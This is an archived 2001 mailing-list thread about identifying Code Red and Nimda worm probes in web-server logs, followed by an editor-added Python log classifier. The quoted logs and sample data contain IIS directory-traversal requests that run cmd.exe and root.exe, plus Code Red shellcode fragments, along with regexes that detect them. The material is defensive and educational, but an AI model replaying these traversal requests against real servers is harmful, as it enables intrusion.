[ale] *OT* But, I need some help.

Frank Zamenski fzamenski at voyager.net
Mon Oct 22 07:31:03 EDT 2001



If this is not Nimda, how does one tell the difference between Code
Red/Blue and Nimda attacks on webserver logs? Not that it's terribly
significant to me as I don't do IIS, but I do look at our Solaris iPlanet
webserver logs on occasion, and have seen some of this stuff on
occasion in the past.

Thanks.
-fgz


From: "Scott Harris" <grynux at earthlink.net>
To: ale at ale.org
To: "Jeb" <jeb_barger at yahoo.com>; "ale ale ale" <ale at ale.org>
Sent: Sunday, October 21, 2001 4:45 PM
Subject: Re: [ale] *OT* But, I need some help.


> Those are hits from the Code Red worm. If you have your server patched for
> it, then they are hits from Code Blue. Go to M$ for the patches.
> ----- Original Message -----
> From: "Jeb" <jeb_barger at yahoo.com>
> To: "ale ale ale" <ale at ale.org>
> Sent: Sunday, October 21, 2001 5:30 PM
> Subject: [ale] *OT* But, I need some help.
>
> >
> >
> > After going through my logs on my winboze IIS server, I have script
> > kiddies (I think), hitting my boxen.
> > However, I don't know what it is.  Could you lend me some of your
> > advice?
> >
> > 2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET /scripts/root.exe /c+dir 404 -
> > 2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET /MSADC/root.exe /c+dir 404 -
> > 2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
> > 2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
> > 2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
> > 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
> > 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
> > 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 404 -
> > 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 -
> > 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
> > 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET /winnt/system32/cmd.exe /c+dir 404 -
> > 2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET /winnt/system32/cmd.exe /c+dir 404 -
> > 2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
> > 2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
> > 2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
> > 2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 -
> >
> > Thanks!
> >
> >



---
This message has been sent through the ALE general discussion list.
See http://www.ale.org/mailing-lists.shtml for more info. Problems should be 
sent to listmaster at ale dot org.
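Added example for Frank's question (this is editor-supplied code, not from any post in the thread): a small classifier that tells Code Red from Nimda in web-server logs. Code Red I/II hit the .ida ISAPI overflow, so they show up as a GET for /default.ida with a query of repeated N or X characters followed by %u-encoded shellcode. Nimda probes for root.exe (the cmd.exe copy that Code Red II left in /scripts and /MSADC) and for cmd.exe through encoded "../" traversals, always with a "/c+dir" query, and fires the whole burst from one source within a couple of seconds, which is exactly what the IIS lines above show. The IIS field order (date time c-ip user s-ip port method stem query status) is assumed from those lines; the NCSA/common-log lines, the Code Red line and the non-probe line are constructed for the example. On Apache or iPlanet the request line is logged as sent, so the percent-encoded traversal survives; IIS logs the decoded form, which is why the overlong-UTF-8 step appears in the archive as a raw byte rendered "Á". Code Blue is deliberately not classified, since the thread gives no request signature for it.

```python
"""Classify web-server log lines as Code Red or Nimda probes.

Editor-added example; not code from the mailing-list posts.  Field order
for IIS W3C lines is assumed from the lines quoted in the thread.
"""
import re

# Code Red I/II: GET /default.ida?NNNN... (I) or XXXX... (II) followed by
# %u-encoded shellcode for the .ida ISAPI buffer overflow (MS01-033).
CODE_RED_STEM_RE = re.compile(r"/default\.ida$", re.I)
CODE_RED_QUERY_RE = re.compile(r"^(N{8,}|X{8,}).*%u9090", re.I)

# Nimda: root.exe under /scripts or /msadc, or cmd.exe via a "..<sep>../"
# traversal where <sep> is %5c, %2f, %35c, %c1%1c, %c0%af, %c1%9c ... or,
# in an already-decoded IIS log, the raw bytes those sequences decode to.
TRAVERSAL_RE = re.compile(r"\.\.[^/.]{1,6}\.\./")
ROOT_EXE_RE = re.compile(r"^/(scripts|msadc)/root\.exe$", re.I)
CMD_EXE_RE = re.compile(r"/winnt/system32/cmd\.exe$", re.I)
DRIVE_ROOT_RE = re.compile(r"^/[cd]/winnt/", re.I)  # Code Red II's C:/D: virtual roots

IIS_FIELDS = ("date", "time", "c_ip", "user", "s_ip", "s_port",
              "method", "stem", "query", "status")
NCSA_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def parse_line(line):
    """Parse one IIS W3C or NCSA common-log line; None if it is neither."""
    parts = line.split()
    if len(parts) >= 10 and re.match(r"\d{4}-\d{2}-\d{2}$", parts[0]):
        rec = dict(zip(IIS_FIELDS, parts))
        return {"client": rec["c_ip"], "when": rec["date"] + " " + rec["time"],
                "method": rec["method"], "stem": rec["stem"],
                "query": "" if rec["query"] == "-" else rec["query"],
                "status": rec["status"]}
    m = NCSA_RE.match(line)
    if m:
        client, when, method, uri, status = m.groups()
        stem, _, query = uri.partition("?")
        return {"client": client, "when": when, "method": method,
                "stem": stem, "query": query, "status": status}
    return None


def classify(rec):
    """Return (label, reason); label is 'code_red', 'nimda' or 'other'."""
    stem, query = rec["stem"], rec["query"]
    if CODE_RED_STEM_RE.search(stem) and CODE_RED_QUERY_RE.match(query):
        return "code_red", ".ida overflow payload on /default.ida"
    if ROOT_EXE_RE.match(stem):
        # One lone root.exe hit may just be a scanner checking for the
        # Code Red II backdoor; the full burst with /c+dir is Nimda.
        return "nimda", "root.exe backdoor probe"
    if CMD_EXE_RE.search(stem):
        if TRAVERSAL_RE.search(stem):
            return "nimda", "cmd.exe via encoded ../ traversal"
        if DRIVE_ROOT_RE.match(stem):
            return "nimda", "cmd.exe via Code Red II /c or /d virtual root"
        return "nimda", "cmd.exe requested directly (traversal already canonicalised)"
    return "other", ""


def summarize(lines):
    """Per source IP: label counts plus first/last timestamp of the burst."""
    per_ip = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        entry = per_ip.setdefault(rec["client"], {"code_red": 0, "nimda": 0, "other": 0,
                                                  "first": rec["when"], "last": rec["when"]})
        entry[classify(rec)[0]] += 1
        entry["last"] = rec["when"]
    return per_ip


# Sample input: the first seven IIS lines are copied from the quoted post
# (the "Á" is the decoded %c1%1c step as the archive rendered it); the
# remaining lines are constructed for this example.
SAMPLE_LOG = [
    "2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET /scripts/root.exe /c+dir 404 -",
    "2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET /MSADC/root.exe /c+dir 404 -",
    "2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -",
    "2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -",
    "2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -",
    "2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 -",
    "2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 -",
    "2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET /index.htm - 200 -",
    "2001-10-21 21:02:13 10.0.0.9 - 65.28.182.80 80 GET /default.ida "
    "NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801=a 200 -",
    '192.0.2.7 - - [21/Oct/2001:20:57:41 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301',
    '192.0.2.7 - - [21/Oct/2001:20:58:02 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX'
    '%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        rec = parse_line(line)
        print(rec["client"], rec["stem"], *classify(rec))
    for ip, counts in summarize(SAMPLE_LOG).items():
        print(ip, counts)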